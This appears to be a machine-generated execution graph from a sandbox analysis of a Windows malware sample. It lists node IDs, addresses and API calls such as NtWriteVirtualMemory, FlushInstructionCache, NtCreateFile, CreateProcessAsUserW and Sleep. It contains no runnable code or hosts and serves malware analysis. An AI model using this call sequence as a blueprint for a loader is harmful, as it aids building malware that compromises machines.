                                                                                                                                                                                                                                                                                                                                                                                                                          execution_graph 32471 2b1c350 32474 2b0f7c8 32471->32474 32475 2b0f7d0 32474->32475 32475->32475 32476 2b0f7d7 32475->32476 34906 2b088b8 LoadLibraryW 32476->34906 32478 2b0f7f1 34911 2af2ee0 QueryPerformanceCounter 32478->34911 32480 2b0f7f6 32481 2b0f800 InetIsOffline 32480->32481 32482 2b0f80a 32481->32482 32483 2b0f81b 32481->32483 34923 2af4530 32482->34923 32485 2af4530 11 API calls 32483->32485 32486 2b0f819 32485->32486 34914 2af4860 32486->34914 34929 2b08274 34906->34929 34908 2b088f1 34940 2b07d78 34908->34940 34912 2af2eed 34911->34912 34913 2af2ef8 GetTickCount 34911->34913 34912->32480 34913->32480 34915 2af4871 34914->34915 34916 2af48ae 34915->34916 34917 2af4897 34915->34917 34919 2af45a0 11 API calls 34916->34919 34918 2af4bcc 11 API calls 34917->34918 34920 2af48a4 34918->34920 34919->34920 34921 2af48df 34920->34921 34922 2af4530 11 API calls 34920->34922 34922->34921 34924 2af4534 34923->34924 34926 2af4544 34923->34926 34924->34926 34927 2af45a0 11 API calls 34924->34927 34925 2af4572 34925->32486 34926->34925 34928 2af2c2c 11 API calls 34926->34928 34927->34926 34928->34925 34930 2af4530 11 API calls 34929->34930 34931 2b08299 34930->34931 34954 2b0798c 34931->34954 34935 2b082b3 34936 2b082bb GetModuleHandleW GetProcAddress GetProcAddress 34935->34936 34937 2b082ee 34936->34937 34975 2af4500 34937->34975 34941 2af4530 11 API calls 34940->34941 34942 2b07d9d 34941->34942 34943 2b0798c 12 API calls 34942->34943 34944 2b07daa 34943->34944 34945 2af47ec 11 API calls 34944->34945 34946 2b07dba 34945->34946 35018 2b081cc 34946->35018 34949 2b08274 15 API calls 34950 2b07dd3 NtWriteVirtualMemory 34949->34950 34951 2b07dff 34950->34951 34952 2af4500 11 API calls 34951->34952 34953 2b07e0c FreeLibrary 34952->34953 34953->32478 34955 2b0799d 34954->34955 34979 2af4bcc 34955->34979 34957 2b07a19 34960 2af47ec 34957->34960 34958 2b079ad 34958->34957 34988 2afbabc CharNextA 34958->34988 34961 2af4851 34960->34961 34962 2af47f0 34960->34962 34963 2af47f8 34962->34963 34964 2af4530 34962->34964 34963->34961 34967 2af4807 34963->34967 34968 2af4530 11 API calls 34963->34968 34965 2af4544 34964->34965 34970 2af45a0 11 API calls 34964->34970 34966 2af4572 34965->34966 34971 2af2c2c 11 API calls 34965->34971 34966->34935 34969 2af45a0 11 API calls 34967->34969 34968->34967 34972 2af4821 34969->34972 34970->34965 34971->34966 34973 2af4530 11 API calls 34972->34973 34974 2af484d 34973->34974 34974->34935 34977 2af4506 34975->34977 34976 2af452c 34976->34908 34977->34976 34978 2af2c2c 11 API calls 34977->34978 34978->34977 34981 2af4bd9 34979->34981 34986 2af4c09 34979->34986 34982 2af4c02 34981->34982 34985 2af4be5 34981->34985 34990 2af45a0 34982->34990 34984 2af4bf3 34984->34958 34989 2af2c44 11 API calls 34985->34989 34995 2af44dc 34986->34995 34988->34958 34989->34984 34991 2af45c8 34990->34991 34992 2af45a4 34990->34992 34991->34986 34999 2af2c10 34992->34999 34994 2af45b1 34994->34986 34996 2af44e2 34995->34996 34998 2af44fd 34995->34998 34996->34998 35009 2af2c2c 34996->35009 34998->34984 35000 2af2c27 34999->35000 35002 2af2c14 34999->35002 35000->34994 35001 2af2c1e 35001->34994 35002->35001 35003 2af2d19 35002->35003 35007 2af6520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 35002->35007 35008 2af2ce8 7 API calls 35003->35008 35006 2af2d3a 35006->34994 35007->35003 35008->35006 35010 2af2c3a 35009->35010 35011 2af2c30 35009->35011 35010->34998 35011->35010 35013 2af2d19 35011->35013 35016 2af6520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 35011->35016 35017 2af2ce8 7 API calls 35013->35017 35015 2af2d3a 35015->34998 35016->35013 35017->35015 35019 2af4530 11 API calls 35018->35019 35020 2b081ef 35019->35020 35021 2b0798c 12 API calls 35020->35021 35022 2b081fc 35021->35022 35023 2b08204 GetModuleHandleA 35022->35023 35024 2b08274 15 API calls 35023->35024 35025 2b08215 GetModuleHandleA 35024->35025 35026 2b08233 35025->35026 35027 2af44dc 11 API calls 35026->35027 35028 2b07dcd 35027->35028 35028->34949 35029 2af4edc 35030 2af4ee9 35029->35030 35034 2af4ef0 35029->35034 35035 2af4c38 35030->35035 35041 2af4c50 35034->35041 35036 2af4c4c 35035->35036 35037 2af4c3c SysAllocStringLen 35035->35037 35036->35034 35037->35036 35038 2af4c30 35037->35038 35039 2af4f3c 35038->35039 35040 2af4f26 SysAllocStringLen 35038->35040 35039->35034 35040->35038 35040->35039 35042 2af4c5c 35041->35042 35043 2af4c56 SysFreeString 35041->35043 35043->35042 35044 2b13e12 35045 2af4860 11 API calls 35044->35045 35046 2b13e33 35045->35046 35047 2b13e4b 35046->35047 35048 2af47ec 11 API calls 35047->35048 35049 2b13e6a 35048->35049 35050 2b13e82 35049->35050 36590 2b089d0 35050->36590 35055 2af4860 11 API calls 35056 2b13ee0 35055->35056 35057 2b13eeb 35056->35057 35058 2b13ef7 35057->35058 35059 2af4860 11 API calls 35058->35059 35060 2b13f18 35059->35060 35061 2b13f23 35060->35061 35062 2b13f30 35061->35062 35063 2af47ec 11 API calls 35062->35063 35064 2b13f4f 35063->35064 35065 2b13f67 35064->35065 35066 2b089d0 20 API calls 35065->35066 35067 2b13f73 35066->35067 35068 2af4860 11 API calls 35067->35068 35069 2b13f94 35068->35069 35070 2b13f9f 35069->35070 35071 2b13fac 35070->35071 35072 2af47ec 11 API calls 35071->35072 35073 2b13fcb 35072->35073 35074 2b13fe3 35073->35074 35075 2b089d0 20 API calls 35074->35075 35076 2b13fef 35075->35076 35077 2af4860 11 API calls 35076->35077 35078 2b14010 35077->35078 35079 2b1401b 35078->35079 35080 2b14028 35079->35080 35081 2af47ec 11 API calls 35080->35081 35082 2b14047 35081->35082 35083 2b14052 35082->35083 35084 2b1405f 35083->35084 35085 2b089d0 20 API calls 35084->35085 35086 2b1406b 35085->35086 36610 2b0e358 35086->36610 35089 2b14091 35090 2b140a2 35089->35090 36615 2b0dc8c 35090->36615 35093 2af4860 11 API calls 35094 2b140f1 35093->35094 35095 2b140fc 35094->35095 35096 2af47ec 11 API calls 35095->35096 35097 2b14128 35096->35097 35098 2b14133 35097->35098 35099 2b089d0 20 API calls 35098->35099 35100 2b1414c 35099->35100 35101 2af4860 11 API calls 35100->35101 35102 2b1416d 35101->35102 35103 2af47ec 11 API calls 35102->35103 35104 2b141a4 35103->35104 35105 2b141af 35104->35105 35106 2b089d0 20 API calls 35105->35106 35107 2b141c8 35106->35107 35108 2b088b8 20 API calls 35107->35108 35109 2b141cd 35108->35109 35110 2b141d7 35109->35110 36630 2b0e678 35110->36630 35113 2af4860 11 API calls 35114 2b14217 35113->35114 35115 2b1422f 35114->35115 35116 2af47ec 11 API calls 35115->35116 35117 2b1424e 35116->35117 35118 2b14259 35117->35118 35119 2b089d0 20 API calls 35118->35119 35120 2b14272 Sleep 35119->35120 35121 2af4860 11 API calls 35120->35121 35122 2b1429d 35121->35122 35123 2b142b5 35122->35123 35124 2af47ec 11 API calls 35123->35124 35125 2b142d4 35124->35125 35126 2b142df 35125->35126 36769 2af46d4 35126->36769 36591 2b089e4 36590->36591 36592 2b081cc 17 API calls 36591->36592 36593 2b08a1d 36592->36593 36594 2b08274 15 API calls 36593->36594 36595 2b08a36 36594->36595 36596 2b07d78 18 API calls 36595->36596 36597 2b08a95 36596->36597 36771 2b08338 36597->36771 36600 2b08abc 36601 2af4500 11 API calls 36600->36601 36602 2b08ac9 36601->36602 36603 2b0f094 36602->36603 36607 2b0f0b9 36603->36607 36604 2b0f0e5 36606 2af44dc 11 API calls 36604->36606 36608 2b0f0fa 36606->36608 36607->36604 36783 2af46c4 11 API calls 36607->36783 36784 2af4530 11 API calls 36607->36784 36608->35055 36611 2af4bcc 11 API calls 36610->36611 36613 2b0e370 36611->36613 36612 2b0e391 36612->35089 36613->36612 36785 2af49f8 36613->36785 36616 2b0dca2 36615->36616 36791 2af4f20 36616->36791 36618 2b0dcaa 36619 2b0dcca RtlDosPathNameToNtPathName_U 36618->36619 36795 2b0dbdc 36619->36795 36621 2b0dce6 NtCreateFile 36622 2b0dd11 36621->36622 36623 2af49f8 11 API calls 36622->36623 36624 2b0dd23 NtWriteFile NtClose 36623->36624 36625 2b0dd4d 36624->36625 36796 2af4c60 36625->36796 36628 2af44dc 11 API calls 36629 2b0dd5d Sleep 36628->36629 36629->35093 36631 2b0e681 36630->36631 36631->36631 36632 2af4860 11 API calls 36631->36632 36633 2b0e6ca 36632->36633 36634 2af47ec 11 API calls 36633->36634 36635 2b0e6ef 36634->36635 36636 2b089d0 20 API calls 36635->36636 36637 2b0e70a 36636->36637 36638 2af4860 11 API calls 36637->36638 36639 2b0e723 36638->36639 36640 2af47ec 11 API calls 36639->36640 36641 2b0e748 36640->36641 36642 2b089d0 20 API calls 36641->36642 36643 2b0e763 36642->36643 36644 2af4860 11 API calls 36643->36644 36645 2b0e77c 36644->36645 36646 2af47ec 11 API calls 36645->36646 36647 2b0e7a1 36646->36647 36648 2b089d0 20 API calls 36647->36648 36649 2b0e7bc 36648->36649 36650 2af4860 11 API calls 36649->36650 36651 2b0e7ee 36650->36651 36652 2b089d0 20 API calls 36651->36652 36653 2b0e838 36652->36653 36654 2af4860 11 API calls 36653->36654 36655 2b0e86f 36654->36655 36656 2af47ec 11 API calls 36655->36656 36657 2b0e894 36656->36657 36658 2b089d0 20 API calls 36657->36658 36659 2b0e8af 36658->36659 36660 2af4860 11 API calls 36659->36660 36661 2b0e8c8 36660->36661 36662 2af47ec 11 API calls 36661->36662 36663 2b0e8ed 36662->36663 36664 2b089d0 20 API calls 36663->36664 36665 2b0e908 36664->36665 36666 2af4860 11 API calls 36665->36666 36667 2b0e921 36666->36667 36668 2af47ec 11 API calls 36667->36668 36669 2b0e946 36668->36669 36670 2b089d0 20 API calls 36669->36670 36671 2b0e961 36670->36671 36799 2af7f2c 36671->36799 36673 2b0e985 36803 2b08788 36673->36803 36676 2af4860 11 API calls 36677 2b0ea0a 36676->36677 36678 2af47ec 11 API calls 36677->36678 36679 2b0ea3b 36678->36679 36680 2b089d0 20 API calls 36679->36680 36681 2b0ea5f 36680->36681 36682 2af4860 11 API calls 36681->36682 36683 2b0ea7b 36682->36683 36684 2af47ec 11 API calls 36683->36684 36685 2b0eaac 36684->36685 36686 2b089d0 20 API calls 36685->36686 36687 2b0ead0 36686->36687 36688 2af4860 11 API calls 36687->36688 36689 2b0eaec 36688->36689 36690 2af47ec 11 API calls 36689->36690 36691 2b0eb1d 36690->36691 36692 2b089d0 20 API calls 36691->36692 36693 2b0eb41 36692->36693 36694 2af4860 11 API calls 36693->36694 36695 2b0eb5d 36694->36695 36696 2af47ec 11 API calls 36695->36696 36697 2b0eb7b 36696->36697 36815 2b0894c LoadLibraryW 36697->36815 36700 2af4860 11 API calls 36701 2b0ebac 36700->36701 36702 2af47ec 11 API calls 36701->36702 36703 2b0ebca 36702->36703 36704 2b0894c 21 API calls 36703->36704 36705 2b0ebdf 36704->36705 36706 2af4860 11 API calls 36705->36706 36707 2b0ebfb 36706->36707 36708 2af47ec 11 API calls 36707->36708 36709 2b0ec19 36708->36709 36710 2b0894c 21 API calls 36709->36710 36711 2b0ec2e 36710->36711 36712 2af4860 11 API calls 36711->36712 36713 2b0ec4a 36712->36713 36714 2af47ec 11 API calls 36713->36714 36715 2b0ec68 36714->36715 36716 2b0894c 21 API calls 36715->36716 36717 2b0ec7d 36716->36717 36718 2b0eee2 36717->36718 36719 2b0ec87 36717->36719 36721 2af4500 11 API calls 36718->36721 36720 2af4860 11 API calls 36719->36720 36724 2b0eca3 36720->36724 36722 2b0eeff 36721->36722 36723 2af4c60 SysFreeString 36722->36723 36725 2b0ef0a 36723->36725 36728 2af47ec 11 API calls 36724->36728 36726 2af4500 11 API calls 36725->36726 36727 2b0ef1a 36726->36727 36729 2af4c60 SysFreeString 36727->36729 36733 2b0ecd4 36728->36733 36730 2b0ef22 36729->36730 36731 2af4500 11 API calls 36730->36731 36732 2b0ef2f 36731->36732 36732->35113 36734 2b089d0 20 API calls 36733->36734 36735 2b0ecf8 36734->36735 36736 2af4860 11 API calls 36735->36736 36737 2b0ed14 36736->36737 36738 2af47ec 11 API calls 36737->36738 36739 2b0ed45 36738->36739 36740 2b089d0 20 API calls 36739->36740 36741 2b0ed69 WaitForSingleObject CloseHandle CloseHandle 36740->36741 36742 2af4860 11 API calls 36741->36742 36743 2b0eda0 36742->36743 36744 2af47ec 11 API calls 36743->36744 36745 2b0edbe 36744->36745 36746 2b0894c 21 API calls 36745->36746 36747 2b0edd3 36746->36747 36748 2af4860 11 API calls 36747->36748 36749 2b0edef 36748->36749 36750 2af47ec 11 API calls 36749->36750 36751 2b0ee0d 36750->36751 36752 2b0894c 21 API calls 36751->36752 36753 2b0ee22 36752->36753 36754 2af4860 11 API calls 36753->36754 36755 2b0ee3e 36754->36755 36756 2af47ec 11 API calls 36755->36756 36757 2b0ee5c 36756->36757 36758 2b0894c 21 API calls 36757->36758 36759 2b0ee71 36758->36759 36760 2af4860 11 API calls 36759->36760 36761 2b0ee8d 36760->36761 36762 2af47ec 11 API calls 36761->36762 36763 2b0eeab 36762->36763 36764 2b0894c 21 API calls 36763->36764 36765 2b0eec0 36764->36765 36766 2b0894c 21 API calls 36765->36766 36767 2b0eed1 36766->36767 36768 2b0894c 21 API calls 36767->36768 36768->36718 36770 2af46da 36769->36770 36772 2af4530 11 API calls 36771->36772 36773 2b0835b 36772->36773 36774 2af4860 11 API calls 36773->36774 36775 2b0837a 36774->36775 36776 2b081cc 17 API calls 36775->36776 36777 2b0838d 36776->36777 36778 2b08274 15 API calls 36777->36778 36779 2b08393 FlushInstructionCache 36778->36779 36780 2b083b9 36779->36780 36781 2af44dc 11 API calls 36780->36781 36782 2b083c1 FreeLibrary 36781->36782 36782->36600 36783->36607 36784->36607 36786 2af49ac 36785->36786 36787 2af45a0 11 API calls 36786->36787 36789 2af49e7 36786->36789 36788 2af49c3 36787->36788 36788->36789 36790 2af2c2c 11 API calls 36788->36790 36789->36613 36790->36789 36792 2af4f3c 36791->36792 36793 2af4f26 SysAllocStringLen 36791->36793 36792->36618 36793->36792 36794 2af4c30 36793->36794 36794->36791 36795->36621 36797 2af4c66 SysFreeString 36796->36797 36798 2af4c74 36796->36798 36797->36798 36798->36628 36800 2af7f3f 36799->36800 36822 2af4a00 36800->36822 36804 2af4530 11 API calls 36803->36804 36805 2b087ab 36804->36805 36806 2af4860 11 API calls 36805->36806 36807 2b087ca 36806->36807 36808 2b081cc 17 API calls 36807->36808 36809 2b087dd 36808->36809 36810 2b08274 15 API calls 36809->36810 36811 2b087e3 CreateProcessAsUserW 36810->36811 36812 2b08827 36811->36812 36813 2af44dc 11 API calls 36812->36813 36814 2b0882f 36813->36814 36814->36676 36816 2b08973 GetProcAddress 36815->36816 36817 2b089bb 36815->36817 36818 2b089b0 FreeLibrary 36816->36818 36819 2b0898d 36816->36819 36817->36700 36818->36817 36820 2b07d78 18 API calls 36819->36820 36821 2b089a5 36820->36821 36821->36818 36823 2af4a05 36822->36823 36824 2af4a32 36822->36824 36823->36824 36827 2af4a19 36823->36827 36825 2af44dc 11 API calls 36824->36825 36826 2af4a28 36825->36826 36826->36673 36829 2af45cc 36827->36829 36830 2af45a0 11 API calls 36829->36830 36831 2af45dc 36830->36831 36832 2af44dc 11 API calls 36831->36832 36833 2af45f4 36832->36833 36833->36826 36834 2af1c6c 36835 2af1c7c 36834->36835 36836 2af1d04 36834->36836 36839 2af1cc0 36835->36839 36843 2af1c89 36835->36843 36837 2af1d0d 36836->36837 36838 2af1f58 36836->36838 36841 2af1d25 36837->36841 36856 2af1e24 36837->36856 36840 2af1fec 36838->36840 36846 2af1fac 36838->36846 36847 2af1f68 36838->36847 36842 2af1724 10 API calls 36839->36842 36849 2af1d2c 36841->36849 36852 2af1d48 36841->36852 36857 2af1dfc 36841->36857 36866 2af1cd7 36842->36866 36844 2af1c94 36843->36844 36882 2af1724 36843->36882 36854 2af1fb2 36846->36854 36858 2af1724 10 API calls 36846->36858 36850 2af1724 10 API calls 36847->36850 36848 2af1e7c 36851 2af1724 10 API calls 36848->36851 36869 2af1e95 36848->36869 36868 2af1f82 36850->36868 36871 2af1f2c 36851->36871 36861 2af1d79 Sleep 36852->36861 36874 2af1d9c 36852->36874 36853 2af1cfd 36855 2af1cb9 36856->36848 36860 2af1e55 Sleep 36856->36860 36856->36869 36862 2af1724 10 API calls 36857->36862 36873 2af1fc1 36858->36873 36859 2af1fa7 36860->36848 36863 2af1e6f Sleep 36860->36863 36864 2af1d91 Sleep 36861->36864 36861->36874 36877 2af1e05 36862->36877 36863->36856 36864->36852 36865 2af1ca1 36865->36855 36906 2af1a8c 36865->36906 36866->36853 36867 2af1a8c 8 API calls 36866->36867 36867->36853 36868->36859 36875 2af1a8c 8 API calls 36868->36875 36871->36869 36876 2af1a8c 8 API calls 36871->36876 36872 2af1e1d 36873->36859 36878 2af1a8c 8 API calls 36873->36878 36875->36859 36879 2af1f50 36876->36879 36877->36872 36880 2af1a8c 8 API calls 36877->36880 36881 2af1fe4 36878->36881 36880->36872 36883 2af1968 36882->36883 36893 2af173c 36882->36893 36884 2af1938 36883->36884 36885 2af1a80 36883->36885 36890 2af1947 Sleep 36884->36890 36892 2af1986 36884->36892 36886 2af1a89 36885->36886 36887 2af1684 VirtualAlloc 36885->36887 36886->36865 36889 2af16af 36887->36889 36899 2af16bf 36887->36899 36888 2af175d 36888->36865 36923 2af1644 36889->36923 36890->36892 36897 2af195d Sleep 36890->36897 36891 2af174e 36891->36888 36896 2af182c 36891->36896 36900 2af180a Sleep 36891->36900 36901 2af15cc VirtualAlloc 36892->36901 36904 2af19a4 36892->36904 36893->36891 36894 2af17cb Sleep 36893->36894 36894->36891 36898 2af17e4 Sleep 36894->36898 36905 2af1838 36896->36905 36929 2af15cc 36896->36929 36897->36884 36898->36893 36899->36865 36900->36896 36902 2af1820 Sleep 36900->36902 36901->36904 36902->36891 36904->36865 36905->36865 36907 2af1b6c 36906->36907 36908 2af1aa1 36906->36908 36909 2af16e8 36907->36909 36910 2af1aa7 36907->36910 36908->36910 36911 2af1b13 Sleep 36908->36911 36913 2af1c66 36909->36913 36916 2af1644 2 API calls 36909->36916 36912 2af1ab0 36910->36912 36915 2af1b4b Sleep 36910->36915 36920 2af1b81 36910->36920 36911->36910 36914 2af1b2d Sleep 36911->36914 36912->36855 36913->36855 36914->36908 36917 2af1b61 Sleep 36915->36917 36915->36920 36918 2af16f5 VirtualFree 36916->36918 36917->36910 36919 2af170d 36918->36919 36919->36855 36921 2af1ba4 36920->36921 36922 2af1c00 VirtualFree 36920->36922 36921->36855 36922->36855 36924 2af1681 36923->36924 36925 2af164d 36923->36925 36924->36899 36925->36924 36926 2af164f Sleep 36925->36926 36927 2af1664 36926->36927 36927->36924 36928 2af1668 Sleep 36927->36928 36928->36925 36933 2af1560 36929->36933 36931 2af15d4 VirtualAlloc 36932 2af15eb 36931->36932 36932->36905 36934 2af1500 36933->36934 36934->36931 36935 2b17074 36936 2af4860 11 API calls 36935->36936 36937 2b17095 36936->36937 36938 2af47ec 11 API calls 36937->36938 36939 2b170cc 36938->36939 36940 2b089d0 20 API calls 36939->36940 36941 2b170f0 36940->36941 36942 2af4860 11 API calls 36941->36942 36943 2b17111 36942->36943 36944 2af47ec 11 API calls 36943->36944 36945 2b17148 36944->36945 36946 2b089d0 20 API calls 36945->36946 36947 2b1716c 36946->36947 36948 2af4860 11 API calls 36947->36948 36949 2b1718d 36948->36949 36950 2af47ec 11 API calls 36949->36950 36951 2b171c4 36950->36951 36952 2b089d0 20 API calls 36951->36952 36953 2b171e8 36952->36953 36954 2af4860 11 API calls 36953->36954 36955 2b17209 36954->36955 36956 2af47ec 11 API calls 36955->36956 36957 2b17240 36956->36957 36958 2b089d0 20 API calls 36957->36958 36959 2b17264 36958->36959 36960 2af4860 11 API calls 36959->36960 36961 2b17285 36960->36961 36962 2af47ec 11 API calls 36961->36962 36963 2b172bc 36962->36963 36964 2b089d0 20 API calls 36963->36964 36965 2b172e0 36964->36965 36966 2af4860 11 API calls 36965->36966 36967 2b1731a 36966->36967 37756 2b0e0f8 36967->37756 36969 2b17349 37766 2b0f214 36969->37766 36972 2af4860 11 API calls 36973 2b17399 36972->36973 36974 2af47ec 11 API calls 36973->36974 36975 2b173d0 36974->36975 36976 2b089d0 20 API calls 36975->36976 36977 2b173f4 36976->36977 36978 2af4860 11 API calls 36977->36978 36979 2b17415 36978->36979 36980 2af47ec 11 API calls 36979->36980 36981 2b1744c 36980->36981 36982 2b089d0 20 API calls 36981->36982 36983 2b17470 36982->36983 36984 2af4860 11 API calls 36983->36984 36985 2b17491 36984->36985 36986 2af47ec 11 API calls 36985->36986 36987 2b174c8 36986->36987 36988 2b089d0 20 API calls 36987->36988 36989 2b174ec 36988->36989 36990 2af4860 11 API calls 36989->36990 36991 2b1750d 36990->36991 36992 2af47ec 11 API calls 36991->36992 36993 2b17544 36992->36993 36994 2b089d0 20 API calls 36993->36994 36995 2b17568 36994->36995 36996 2af4860 11 API calls 36995->36996 36997 2b17589 36996->36997 36998 2af47ec 11 API calls 36997->36998 36999 2b175c0 36998->36999 37000 2b089d0 20 API calls 36999->37000 37001 2b175e4 37000->37001 37002 2af4860 11 API calls 37001->37002 37003 2b17605 37002->37003 37004 2af47ec 11 API calls 37003->37004 37005 2b1763c 37004->37005 37006 2b089d0 20 API calls 37005->37006 37007 2b17660 37006->37007 37008 2af4860 11 API calls 37007->37008 37009 2b17681 37008->37009 37010 2af47ec 11 API calls 37009->37010 37011 2b176b8 37010->37011 37012 2b089d0 20 API calls 37011->37012 37013 2b176dc 37012->37013 37014 2af4860 11 API calls 37013->37014 37015 2b176fd 37014->37015 37016 2af47ec 11 API calls 37015->37016 37017 2b17734 37016->37017 37018 2b089d0 20 API calls 37017->37018 37019 2b17758 37018->37019 37020 2af4860 11 API calls 37019->37020 37021 2b17779 37020->37021 37022 2af47ec 11 API calls 37021->37022 37023 2b177b0 37022->37023 37024 2b089d0 20 API calls 37023->37024 37025 2b177d4 37024->37025 37026 2b177e9 37025->37026 37027 2b18318 37025->37027 37029 2af4860 11 API calls 37026->37029 37028 2af4860 11 API calls 37027->37028 37031 2b18339 37028->37031 37030 2b1780a 37029->37030 37032 2af47ec 11 API calls 37030->37032 37033 2af47ec 11 API calls 37031->37033 37034 2b17841 37032->37034 37035 2b18370 37033->37035 37036 2b089d0 20 API calls 37034->37036 37037 2b089d0 20 API calls 37035->37037 37038 2b17865 37036->37038 37039 2b18394 37037->37039 37041 2af4860 11 API calls 37038->37041 37040 2af4860 11 API calls 37039->37040 37042 2b183b5 37040->37042 37043 2b17886 37041->37043 37045 2af47ec 11 API calls 37042->37045 37044 2af47ec 11 API calls 37043->37044 37046 2b178bd 37044->37046 37047 2b183ec 37045->37047 37048 2b089d0 20 API calls 37046->37048 37049 2b089d0 20 API calls 37047->37049 37050 2b178e1 37048->37050 37051 2b18410 37049->37051 37052 2af4860 11 API calls 37050->37052 37053 2af4860 11 API calls 37051->37053 37055 2b17902 37052->37055 37054 2b18431 37053->37054 37056 2af47ec 11 API calls 37054->37056 37057 2af47ec 11 API calls 37055->37057 37059 2b18468 37056->37059 37058 2b17939 37057->37058 37060 2b089d0 20 API calls 37058->37060 37061 2b089d0 20 API calls 37059->37061 37062 2b1795d 37060->37062 37063 2b1848c 37061->37063 37064 2af47ec 11 API calls 37062->37064 37065 2af4860 11 API calls 37063->37065 37066 2b17975 37064->37066 37067 2b184ad 37065->37067 38183 2b085bc 37066->38183 37070 2af47ec 11 API calls 37067->37070 37073 2b184e4 37070->37073 37071 2af4860 11 API calls 37072 2b179a7 37071->37072 37074 2af47ec 11 API calls 37072->37074 37075 2b089d0 20 API calls 37073->37075 37077 2b179de 37074->37077 37076 2b18508 37075->37076 37078 2b193a1 37076->37078 37079 2b1851d 37076->37079 37082 2b089d0 20 API calls 37077->37082 37080 2af4860 11 API calls 37078->37080 37081 2af4860 11 API calls 37079->37081 37087 2b193c2 37080->37087 37083 2b1853e 37081->37083 37084 2b17a02 37082->37084 37086 2b18556 37083->37086 37085 2af4860 11 API calls 37084->37085 37091 2b17a23 37085->37091 37088 2af47ec 11 API calls 37086->37088 37089 2af47ec 11 API calls 37087->37089 37090 2b18575 37088->37090 37093 2b193f9 37089->37093 37094 2b1858d 37090->37094 37092 2af47ec 11 API calls 37091->37092 37097 2b17a5a 37092->37097 37095 2b089d0 20 API calls 37093->37095 37096 2b089d0 20 API calls 37094->37096 37098 2b1941d 37095->37098 37099 2b18599 37096->37099 37102 2b089d0 20 API calls 37097->37102 37100 2af4860 11 API calls 37098->37100 37101 2af4860 11 API calls 37099->37101 37106 2b1943e 37100->37106 37103 2b185ba 37101->37103 37104 2b17a7e 37102->37104 37107 2b185c5 37103->37107 37105 2af4860 11 API calls 37104->37105 37111 2b17a9f 37105->37111 37109 2af47ec 11 API calls 37106->37109 37108 2af47ec 11 API calls 37107->37108 37110 2b185f1 37108->37110 37113 2b19475 37109->37113 37114 2b185fc 37110->37114 37112 2af47ec 11 API calls 37111->37112 37117 2b17ad6 37112->37117 37115 2b089d0 20 API calls 37113->37115 37116 2b089d0 20 API calls 37114->37116 37118 2b19499 37115->37118 37119 2b18615 37116->37119 37122 2b089d0 20 API calls 37117->37122 37120 2af4860 11 API calls 37118->37120 37121 2af4860 11 API calls 37119->37121 37123 2b194ba 37120->37123 37124 2b18636 37121->37124 37125 2b17afa 37122->37125 37126 2af47ec 11 API calls 37123->37126 37127 2af47ec 11 API calls 37124->37127 38195 2b0adf8 29 API calls 37125->38195 37132 2b194f1 37126->37132 37131 2b1866d 37127->37131 37129 2b17b21 37130 2af4860 11 API calls 37129->37130 37135 2b17b42 37130->37135 37134 2b089d0 20 API calls 37131->37134 37133 2b089d0 20 API calls 37132->37133 37144 2b19515 37133->37144 37136 2b18691 37134->37136 37138 2af47ec 11 API calls 37135->37138 37137 2af47ec 11 API calls 37136->37137 37139 2b186bd 37137->37139 37143 2b17b79 37138->37143 37142 2b186d5 37139->37142 37140 2b19cf5 37141 2af4860 11 API calls 37140->37141 37147 2b19d16 37141->37147 37148 2b186e0 CreateProcessAsUserW 37142->37148 37146 2b089d0 20 API calls 37143->37146 37144->37140 37145 2af4860 11 API calls 37144->37145 37157 2b19560 37145->37157 37149 2b17b9d 37146->37149 37154 2af47ec 11 API calls 37147->37154 37150 2b186f2 37148->37150 37151 2b1876e 37148->37151 37153 2af4860 11 API calls 37149->37153 37152 2af4860 11 API calls 37150->37152 37155 2af4860 11 API calls 37151->37155 37156 2b18713 37152->37156 37162 2b17bbe 37153->37162 37160 2b19d4d 37154->37160 37161 2b1878f 37155->37161 37158 2b1871e 37156->37158 37159 2af47ec 11 API calls 37157->37159 37166 2af47ec 11 API calls 37158->37166 37167 2b19597 37159->37167 37164 2b089d0 20 API calls 37160->37164 37165 2af47ec 11 API calls 37161->37165 37163 2af47ec 11 API calls 37162->37163 37173 2b17bf5 37163->37173 37168 2b19d71 37164->37168 37175 2b187c6 37165->37175 37169 2b1874a 37166->37169 37171 2b089d0 20 API calls 37167->37171 37170 2af4860 11 API calls 37168->37170 37172 2b18755 37169->37172 37178 2b19d92 37170->37178 37174 2b195bb 37171->37174 37180 2b089d0 20 API calls 37172->37180 37177 2b089d0 20 API calls 37173->37177 37176 2af4860 11 API calls 37174->37176 37179 2b089d0 20 API calls 37175->37179 37186 2b195dc 37176->37186 37181 2b17c19 37177->37181 37184 2af47ec 11 API calls 37178->37184 37182 2b187ea 37179->37182 37180->37151 37183 2af4860 11 API calls 37181->37183 37185 2af4860 11 API calls 37182->37185 37190 2b17c3a 37183->37190 37188 2b19dc9 37184->37188 37189 2b1880b 37185->37189 37187 2af47ec 11 API calls 37186->37187 37194 2b19613 37187->37194 37191 2b089d0 20 API calls 37188->37191 37192 2af47ec 11 API calls 37189->37192 37193 2af47ec 11 API calls 37190->37193 37195 2b19ded 37191->37195 37200 2b18842 37192->37200 37198 2b17c71 37193->37198 37197 2b089d0 20 API calls 37194->37197 37196 2af4860 11 API calls 37195->37196 37203 2b19e0e 37196->37203 37199 2b19637 37197->37199 37202 2b089d0 20 API calls 37198->37202 37201 2af4860 11 API calls 37199->37201 37204 2b089d0 20 API calls 37200->37204 37208 2b19658 37201->37208 37205 2b17c95 37202->37205 37207 2af47ec 11 API calls 37203->37207 37206 2b18866 37204->37206 37210 2af4860 11 API calls 37205->37210 37209 2af49f8 11 API calls 37206->37209 37213 2b19e45 37207->37213 37212 2af47ec 11 API calls 37208->37212 37211 2b1888a 37209->37211 37217 2b17cd5 37210->37217 37214 2af4860 11 API calls 37211->37214 37218 2b1968f 37212->37218 37215 2b089d0 20 API calls 37213->37215 37216 2b188b9 37214->37216 37222 2b19e69 37215->37222 37223 2b188c4 37216->37223 37219 2af47ec 11 API calls 37217->37219 37220 2b089d0 20 API calls 37218->37220 37226 2b17d0c 37219->37226 37221 2b196b3 37220->37221 37224 2b0f094 11 API calls 37221->37224 37228 2b089d0 20 API calls 37222->37228 37225 2af47ec 11 API calls 37223->37225 37227 2b196ce 37224->37227 37229 2b188f0 37225->37229 37231 2b089d0 20 API calls 37226->37231 37230 2af4860 11 API calls 37227->37230 37234 2b19e9c 37228->37234 37235 2b188fb 37229->37235 37236 2b196f7 37230->37236 37232 2b17d30 37231->37232 37233 2af4860 11 API calls 37232->37233 37242 2b17d51 37233->37242 37238 2b089d0 20 